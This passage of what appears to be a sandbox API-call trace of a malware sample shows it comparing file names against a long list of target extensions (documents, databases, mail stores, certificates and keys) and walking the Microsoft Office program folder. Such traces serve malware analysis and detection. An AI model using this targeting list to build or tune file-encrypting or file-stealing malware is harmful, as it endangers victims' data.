(lpString1=".cfm", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".cfml") returned 5 [0271.783] lstrcmpiW (lpString1=".cfml", lpString2="2.XLL") returned -1 [0271.783] lstrlenW (lpString=".cfu") returned 4 [0271.783] lstrcmpiW (lpString1=".cfu", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".chm") returned 4 [0271.783] lstrcmpiW (lpString1=".chm", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".cin") returned 4 [0271.783] lstrcmpiW (lpString1=".cin", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".class") returned 6 [0271.783] lstrcmpiW (lpString1=".class", lpString2="32.XLL") returned -1 [0271.783] lstrlenW (lpString=".clx") returned 4 [0271.783] lstrcmpiW (lpString1=".clx", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".config") returned 7 [0271.783] lstrcmpiW (lpString1=".config", lpString2="S32.XLL") returned -1 [0271.783] lstrlenW (lpString=".cpp") returned 4 [0271.783] lstrcmpiW (lpString1=".cpp", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".cr2") returned 4 [0271.783] lstrcmpiW (lpString1=".cr2", lpString2=".XLL") returned -1 [0271.783] lstrlenW (lpString=".crt") returned 4 [0271.783] lstrcmpiW (lpString1=".crt", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".crw") returned 4 [0271.784] lstrcmpiW (lpString1=".crw", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".cs") returned 3 [0271.784] lstrcmpiW (lpString1=".cs", lpString2="XLL") returned -1 [0271.784] lstrlenW (lpString=".css") returned 4 [0271.784] lstrcmpiW (lpString1=".css", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".csv") returned 4 [0271.784] lstrcmpiW (lpString1=".csv", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".cub") returned 4 [0271.784] lstrcmpiW (lpString1=".cub", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".dae") returned 4 [0271.784] lstrcmpiW (lpString1=".dae", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".dat") returned 4 [0271.784] lstrcmpiW (lpString1=".dat", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".db") returned 3 [0271.784] lstrcmpiW (lpString1=".db", lpString2="XLL") returned -1 [0271.784] lstrlenW (lpString=".dbf") returned 4 [0271.784] lstrcmpiW (lpString1=".dbf", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".dbx") returned 4 [0271.784] lstrcmpiW (lpString1=".dbx", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".dc3") returned 4 [0271.784] lstrcmpiW (lpString1=".dc3", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".dcm") returned 4 [0271.784] lstrcmpiW (lpString1=".dcm", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".dcr") returned 4 [0271.784] lstrcmpiW (lpString1=".dcr", lpString2=".XLL") returned -1 [0271.784] lstrlenW (lpString=".der") returned 4 [0271.784] lstrcmpiW (lpString1=".der", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".dib") returned 4 [0271.785] lstrcmpiW (lpString1=".dib", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".dic") returned 4 [0271.785] lstrcmpiW (lpString1=".dic", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".dif") returned 4 [0271.785] lstrcmpiW (lpString1=".dif", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".divx") returned 5 [0271.785] lstrcmpiW (lpString1=".divx", lpString2="2.XLL") returned -1 [0271.785] lstrlenW (lpString=".djvu") returned 5 [0271.785] lstrcmpiW (lpString1=".djvu", lpString2="2.XLL") returned -1 [0271.785] lstrlenW (lpString=".dng") returned 4 [0271.785] lstrcmpiW (lpString1=".dng", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".doc") returned 4 [0271.785] lstrcmpiW (lpString1=".doc", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".docm") returned 5 [0271.785] lstrcmpiW (lpString1=".docm", lpString2="2.XLL") returned -1 [0271.785] lstrlenW (lpString=".docx") returned 5 [0271.785] lstrcmpiW (lpString1=".docx", lpString2="2.XLL") returned -1 [0271.785] lstrlenW (lpString=".dot") returned 4 [0271.785] lstrcmpiW (lpString1=".dot", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".dotm") returned 5 [0271.785] lstrcmpiW (lpString1=".dotm", lpString2="2.XLL") returned -1 [0271.785] lstrlenW (lpString=".dotx") returned 5 [0271.785] lstrcmpiW (lpString1=".dotx", lpString2="2.XLL") returned -1 [0271.785] lstrlenW (lpString=".dpx") returned 4 [0271.785] lstrcmpiW (lpString1=".dpx", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".dqy") returned 4 [0271.785] lstrcmpiW (lpString1=".dqy", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".dsn") returned 4 [0271.785] lstrcmpiW (lpString1=".dsn", lpString2=".XLL") returned -1 [0271.785] lstrlenW (lpString=".dt") returned 3 [0271.785] lstrcmpiW (lpString1=".dt", lpString2="XLL") returned -1 [0271.785] lstrlenW (lpString=".dtd") returned 4 [0271.785] lstrcmpiW (lpString1=".dtd", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".dwg") returned 4 [0271.786] lstrcmpiW (lpString1=".dwg", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".dwt") returned 4 [0271.786] lstrcmpiW (lpString1=".dwt", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".dx") returned 3 [0271.786] lstrcmpiW (lpString1=".dx", lpString2="XLL") returned -1 [0271.786] lstrlenW (lpString=".dxf") returned 4 [0271.786] lstrcmpiW (lpString1=".dxf", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".edml") returned 5 [0271.786] lstrcmpiW (lpString1=".edml", lpString2="2.XLL") returned -1 [0271.786] lstrlenW (lpString=".efd") returned 4 [0271.786] lstrcmpiW (lpString1=".efd", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".elf") returned 4 [0271.786] lstrcmpiW (lpString1=".elf", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".emf") returned 4 [0271.786] lstrcmpiW (lpString1=".emf", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".emz") returned 4 [0271.786] lstrcmpiW (lpString1=".emz", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".epf") returned 4 [0271.786] lstrcmpiW (lpString1=".epf", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".eps") returned 4 [0271.786] lstrcmpiW (lpString1=".eps", lpString2=".XLL") returned -1 [0271.786] lstrlenW (lpString=".epsf") returned 5 [0271.787] lstrcmpiW (lpString1=".epsf", lpString2="2.XLL") returned -1 [0271.787] lstrlenW (lpString=".epsp") returned 5 [0271.787] lstrcmpiW (lpString1=".epsp", lpString2="2.XLL") returned -1 [0271.787] lstrlenW (lpString=".erf") returned 4 [0271.787] lstrcmpiW (lpString1=".erf", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".exr") returned 4 [0271.787] lstrcmpiW (lpString1=".exr", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".f4v") returned 4 [0271.787] lstrcmpiW (lpString1=".f4v", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".fido") returned 5 [0271.787] lstrcmpiW (lpString1=".fido", lpString2="2.XLL") returned -1 [0271.787] lstrlenW (lpString=".flm") returned 4 [0271.787] lstrcmpiW (lpString1=".flm", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".flv") returned 4 [0271.787] lstrcmpiW (lpString1=".flv", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".frm") returned 4 [0271.787] lstrcmpiW (lpString1=".frm", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".fxg") returned 4 [0271.787] lstrcmpiW (lpString1=".fxg", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".geo") returned 4 [0271.787] lstrcmpiW (lpString1=".geo", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".gif") returned 4 [0271.787] lstrcmpiW (lpString1=".gif", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".grs") returned 4 [0271.787] lstrcmpiW (lpString1=".grs", lpString2=".XLL") returned -1 [0271.787] lstrlenW (lpString=".gz") returned 3 [0271.787] lstrcmpiW (lpString1=".gz", lpString2="XLL") returned -1 [0271.787] lstrlenW (lpString=".h") returned 2 [0271.788] lstrcmpiW (lpString1=".h", lpString2="LL") returned -1 [0271.788] lstrlenW (lpString=".hdr") returned 4 [0271.788] lstrcmpiW (lpString1=".hdr", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".hpp") returned 4 [0271.788] lstrcmpiW (lpString1=".hpp", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".hta") returned 4 [0271.788] lstrcmpiW (lpString1=".hta", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".htc") returned 4 [0271.788] lstrcmpiW (lpString1=".htc", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".htm") returned 4 [0271.788] lstrcmpiW (lpString1=".htm", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".html") returned 5 [0271.788] lstrcmpiW (lpString1=".html", lpString2="2.XLL") returned -1 [0271.788] lstrlenW (lpString=".icb") returned 4 [0271.788] lstrcmpiW (lpString1=".icb", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".ics") returned 4 [0271.788] lstrcmpiW (lpString1=".ics", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".iff") returned 4 [0271.788] lstrcmpiW (lpString1=".iff", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".inc") returned 4 [0271.788] lstrcmpiW (lpString1=".inc", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".indd") returned 5 [0271.788] lstrcmpiW (lpString1=".indd", lpString2="2.XLL") returned -1 [0271.788] lstrlenW (lpString=".ini") returned 4 [0271.788] lstrcmpiW (lpString1=".ini", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".iqy") returned 4 [0271.788] lstrcmpiW (lpString1=".iqy", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".j2c") returned 4 [0271.788] lstrcmpiW (lpString1=".j2c", lpString2=".XLL") returned -1 [0271.788] lstrlenW (lpString=".j2k") returned 4 [0271.789] lstrcmpiW (lpString1=".j2k", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".java") returned 5 [0271.789] lstrcmpiW (lpString1=".java", lpString2="2.XLL") returned -1 [0271.789] lstrlenW (lpString=".jp2") returned 4 [0271.789] lstrcmpiW (lpString1=".jp2", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".jpc") returned 4 [0271.789] lstrcmpiW (lpString1=".jpc", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".jpe") returned 4 [0271.789] lstrcmpiW (lpString1=".jpe", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".jpeg") returned 5 [0271.789] lstrcmpiW (lpString1=".jpeg", lpString2="2.XLL") returned -1 [0271.789] lstrlenW (lpString=".jpf") returned 4 [0271.789] lstrcmpiW (lpString1=".jpf", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".jpg") returned 4 [0271.789] lstrcmpiW (lpString1=".jpg", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".jpx") returned 4 [0271.789] lstrcmpiW (lpString1=".jpx", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".js") returned 3 [0271.789] lstrcmpiW (lpString1=".js", lpString2="XLL") returned -1 [0271.789] lstrlenW (lpString=".jsf") returned 4 [0271.789] lstrcmpiW (lpString1=".jsf", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".json") returned 5 [0271.789] lstrcmpiW (lpString1=".json", lpString2="2.XLL") returned -1 [0271.789] lstrlenW (lpString=".jsp") returned 4 [0271.789] lstrcmpiW (lpString1=".jsp", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".kdc") returned 4 [0271.789] lstrcmpiW (lpString1=".kdc", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".kmz") returned 4 [0271.789] lstrcmpiW (lpString1=".kmz", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".kwm") returned 4 [0271.789] lstrcmpiW (lpString1=".kwm", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".lasso") returned 6 [0271.789] lstrcmpiW (lpString1=".lasso", lpString2="32.XLL") returned -1 [0271.789] lstrlenW (lpString=".lbi") returned 4 [0271.789] lstrcmpiW (lpString1=".lbi", lpString2=".XLL") returned -1 [0271.789] lstrlenW (lpString=".lgf") returned 4 [0271.790] lstrcmpiW (lpString1=".lgf", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".lgp") returned 4 [0271.790] lstrcmpiW (lpString1=".lgp", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".log") returned 4 [0271.790] lstrcmpiW (lpString1=".log", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".m1v") returned 4 [0271.790] lstrcmpiW (lpString1=".m1v", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".m4a") returned 4 [0271.790] lstrcmpiW (lpString1=".m4a", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".m4v") returned 4 [0271.790] lstrcmpiW (lpString1=".m4v", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".max") returned 4 [0271.790] lstrcmpiW (lpString1=".max", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".md") returned 3 [0271.790] lstrcmpiW (lpString1=".md", lpString2="XLL") returned -1 [0271.790] lstrlenW (lpString=".mda") returned 4 [0271.790] lstrcmpiW (lpString1=".mda", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mdb") returned 4 [0271.790] lstrcmpiW (lpString1=".mdb", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mde") returned 4 [0271.790] lstrcmpiW (lpString1=".mde", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mdf") returned 4 [0271.790] lstrcmpiW (lpString1=".mdf", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mdw") returned 4 [0271.790] lstrcmpiW (lpString1=".mdw", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mef") returned 4 [0271.790] lstrcmpiW (lpString1=".mef", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mft") returned 4 [0271.790] lstrcmpiW (lpString1=".mft", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mfw") returned 4 [0271.790] lstrcmpiW (lpString1=".mfw", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mht") returned 4 [0271.790] lstrcmpiW (lpString1=".mht", lpString2=".XLL") returned -1 [0271.790] lstrlenW (lpString=".mhtml") returned 6 [0271.791] lstrcmpiW (lpString1=".mhtml", lpString2="32.XLL") returned -1 [0271.791] lstrlenW (lpString=".mka") returned 4 [0271.791] lstrcmpiW (lpString1=".mka", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mkidx") returned 6 [0271.791] lstrcmpiW (lpString1=".mkidx", lpString2="32.XLL") returned -1 [0271.791] lstrlenW (lpString=".mkv") returned 4 [0271.791] lstrcmpiW (lpString1=".mkv", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mos") returned 4 [0271.791] lstrcmpiW (lpString1=".mos", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mov") returned 4 [0271.791] lstrcmpiW (lpString1=".mov", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mp3") returned 4 [0271.791] lstrcmpiW (lpString1=".mp3", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mp4") returned 4 [0271.791] lstrcmpiW (lpString1=".mp4", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mpeg") returned 5 [0271.791] lstrcmpiW (lpString1=".mpeg", lpString2="2.XLL") returned -1 [0271.791] lstrlenW (lpString=".mpg") returned 4 [0271.791] lstrcmpiW (lpString1=".mpg", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mpv") returned 4 [0271.791] lstrcmpiW (lpString1=".mpv", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mrw") returned 4 [0271.791] lstrcmpiW (lpString1=".mrw", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".msg") returned 4 [0271.791] lstrcmpiW (lpString1=".msg", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".mxl") returned 4 [0271.791] lstrcmpiW (lpString1=".mxl", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".myd") returned 4 [0271.791] lstrcmpiW (lpString1=".myd", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".myi") returned 4 [0271.791] lstrcmpiW (lpString1=".myi", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".nef") returned 4 [0271.791] lstrcmpiW (lpString1=".nef", lpString2=".XLL") returned -1 [0271.791] lstrlenW (lpString=".nrw") returned 4 [0271.792] lstrcmpiW (lpString1=".nrw", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".obj") returned 4 [0271.792] lstrcmpiW (lpString1=".obj", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".odb") returned 4 [0271.792] lstrcmpiW (lpString1=".odb", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".odc") returned 4 [0271.792] lstrcmpiW (lpString1=".odc", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".odm") returned 4 [0271.792] lstrcmpiW (lpString1=".odm", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".odp") returned 4 [0271.792] lstrcmpiW (lpString1=".odp", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".ods") returned 4 [0271.792] lstrcmpiW (lpString1=".ods", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".oft") returned 4 [0271.792] lstrcmpiW (lpString1=".oft", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".one") returned 4 [0271.792] lstrcmpiW (lpString1=".one", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".onepkg") returned 7 [0271.792] lstrcmpiW (lpString1=".onepkg", lpString2="S32.XLL") returned -1 [0271.792] lstrlenW (lpString=".onetoc2") returned 8 [0271.792] lstrcmpiW (lpString1=".onetoc2", lpString2="YS32.XLL") returned -1 [0271.792] lstrlenW (lpString=".opt") returned 4 [0271.792] lstrcmpiW (lpString1=".opt", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".oqy") returned 4 [0271.792] lstrcmpiW (lpString1=".oqy", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".orf") returned 4 [0271.792] lstrcmpiW (lpString1=".orf", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".p12") returned 4 [0271.792] lstrcmpiW (lpString1=".p12", lpString2=".XLL") returned -1 [0271.792] lstrlenW (lpString=".p7b") returned 4 [0271.793] lstrcmpiW (lpString1=".p7b", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".p7c") returned 4 [0271.793] lstrcmpiW (lpString1=".p7c", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pam") returned 4 [0271.793] lstrcmpiW (lpString1=".pam", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pbm") returned 4 [0271.793] lstrcmpiW (lpString1=".pbm", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pct") returned 4 [0271.793] lstrcmpiW (lpString1=".pct", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pcx") returned 4 [0271.793] lstrcmpiW (lpString1=".pcx", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pdd") returned 4 [0271.793] lstrcmpiW (lpString1=".pdd", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pdf") returned 4 [0271.793] lstrcmpiW (lpString1=".pdf", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pdp") returned 4 [0271.793] lstrcmpiW (lpString1=".pdp", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pef") returned 4 [0271.793] lstrcmpiW (lpString1=".pef", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pem") returned 4 [0271.793] lstrcmpiW (lpString1=".pem", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pff") returned 4 [0271.793] lstrcmpiW (lpString1=".pff", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pfm") returned 4 [0271.793] lstrcmpiW (lpString1=".pfm", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pfx") returned 4 [0271.793] lstrcmpiW (lpString1=".pfx", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".pgm") returned 4 [0271.793] lstrcmpiW (lpString1=".pgm", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".php") returned 4 [0271.793] lstrcmpiW (lpString1=".php", lpString2=".XLL") returned -1 [0271.793] lstrlenW (lpString=".php3") returned 5 [0271.793] lstrcmpiW (lpString1=".php3", lpString2="2.XLL") returned -1 [0271.793] lstrlenW (lpString=".php4") returned 5 [0271.793] lstrcmpiW (lpString1=".php4", lpString2="2.XLL") returned -1 [0271.793] lstrlenW (lpString=".php5") returned 5 [0271.794] lstrcmpiW (lpString1=".php5", lpString2="2.XLL") returned -1 [0271.794] lstrlenW (lpString=".phtml") returned 6 [0271.794] lstrcmpiW (lpString1=".phtml", lpString2="32.XLL") returned -1 [0271.794] lstrlenW (lpString=".pict") returned 5 [0271.794] lstrcmpiW (lpString1=".pict", lpString2="2.XLL") returned -1 [0271.794] lstrlenW (lpString=".pl") returned 3 [0271.794] lstrcmpiW (lpString1=".pl", lpString2="XLL") returned -1 [0271.794] lstrlenW (lpString=".pls") returned 4 [0271.794] lstrcmpiW (lpString1=".pls", lpString2=".XLL") returned -1 [0271.794] lstrlenW (lpString=".pm") returned 3 [0271.794] lstrcmpiW (lpString1=".pm", lpString2="XLL") returned -1 [0271.794] lstrlenW (lpString=".png") returned 4 [0271.794] lstrcmpiW (lpString1=".png", lpString2=".XLL") returned -1 [0271.794] lstrlenW (lpString=".pnm") returned 4 [0271.794] lstrcmpiW (lpString1=".pnm", lpString2=".XLL") returned -1 [0271.794] lstrlenW (lpString=".pot") returned 4 [0271.794] lstrcmpiW (lpString1=".pot", lpString2=".XLL") returned -1 [0271.794] lstrlenW (lpString=".potm") returned 5 [0271.794] lstrcmpiW (lpString1=".potm", lpString2="2.XLL") returned -1 [0271.794] lstrlenW (lpString=".potx") returned 5 [0271.794] lstrcmpiW (lpString1=".potx", lpString2="2.XLL") returned -1 [0271.794] lstrlenW (lpString=".ppa") returned 4 [0271.794] lstrcmpiW (lpString1=".ppa", lpString2=".XLL") returned -1 [0271.794] lstrlenW (lpString=".ppam") returned 5 [0271.794] lstrcmpiW (lpString1=".ppam", lpString2="2.XLL") returned -1 [0271.794] lstrlenW (lpString=".ppm") returned 4 [0271.794] lstrcmpiW (lpString1=".ppm", lpString2=".XLL") returned -1 [0271.794] lstrlenW (lpString=".pps") returned 4 [0271.794] lstrcmpiW (lpString1=".pps", lpString2=".XLL") returned -1 [0271.794] lstrlenW (lpString=".ppsm") returned 5 [0271.795] lstrcmpiW (lpString1=".ppsm", lpString2="2.XLL") returned -1 [0271.795] lstrlenW (lpString=".ppt") returned 4 [0271.795] lstrcmpiW (lpString1=".ppt", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".pptm") returned 5 [0271.795] lstrcmpiW (lpString1=".pptm", lpString2="2.XLL") returned -1 [0271.795] lstrlenW (lpString=".pptx") returned 5 [0271.795] lstrcmpiW (lpString1=".pptx", lpString2="2.XLL") returned -1 [0271.795] lstrlenW (lpString=".prn") returned 4 [0271.795] lstrcmpiW (lpString1=".prn", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".ps") returned 3 [0271.795] lstrcmpiW (lpString1=".ps", lpString2="XLL") returned -1 [0271.795] lstrlenW (lpString=".psb") returned 4 [0271.795] lstrcmpiW (lpString1=".psb", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".psd") returned 4 [0271.795] lstrcmpiW (lpString1=".psd", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".pst") returned 4 [0271.795] lstrcmpiW (lpString1=".pst", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".ptx") returned 4 [0271.795] lstrcmpiW (lpString1=".ptx", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".pub") returned 4 [0271.795] lstrcmpiW (lpString1=".pub", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".pwm") returned 4 [0271.795] lstrcmpiW (lpString1=".pwm", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".pxr") returned 4 [0271.795] lstrcmpiW (lpString1=".pxr", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".py") returned 3 [0271.795] lstrcmpiW (lpString1=".py", lpString2="XLL") returned -1 [0271.795] lstrlenW (lpString=".qt") returned 3 [0271.795] lstrcmpiW (lpString1=".qt", lpString2="XLL") returned -1 [0271.795] lstrlenW (lpString=".r3d") returned 4 [0271.795] lstrcmpiW (lpString1=".r3d", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".raf") returned 4 [0271.795] lstrcmpiW (lpString1=".raf", lpString2=".XLL") returned -1 [0271.795] lstrlenW (lpString=".rar") returned 4 [0271.796] lstrcmpiW (lpString1=".rar", lpString2=".XLL") returned -1 [0271.796] lstrlenW (lpString=".raw") returned 4 [0271.796] lstrcmpiW (lpString1=".raw", lpString2=".XLL") returned -1 [0272.412] FindClose (in: hFindFile=0x3581040 | out: hFindFile=0x3581040) returned 1 [0272.412] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4200050 | out: hHeap=0x4a0000) returned 1 [0272.412] FindNextFileW (in: hFindFile=0x3580ec0, lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbccffc00, ftCreationTime.dwHighDateTime=0x1c43c6f, ftLastAccessTime.dwLowDateTime=0x5e822870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbccffc00, ftLastWriteTime.dwHighDateTime=0x1c43c6f, nFileSizeHigh=0x0, nFileSizeLow=0x2851, dwReserved0=0x0, dwReserved1=0x0, cFileName="XML2WORD.XSL", cAlternateFileName="")) returned 1 [0272.412] FindClose (in: hFindFile=0x3580ec0 | out: hFindFile=0x3580ec0) returned 1 [0272.413] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3595468 | out: hHeap=0x4a0000) returned 1 [0272.413] FindNextFileW (in: hFindFile=0x3580a40, lpFindFileData=0x3cdf808 | out: lpFindFileData=0x3cdf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0272.413] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\*", lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3580ec0 [0272.414] FindNextFileW (in: hFindFile=0x3580ec0, lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.414] FindNextFileW (in: hFindFile=0x3580ec0, lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 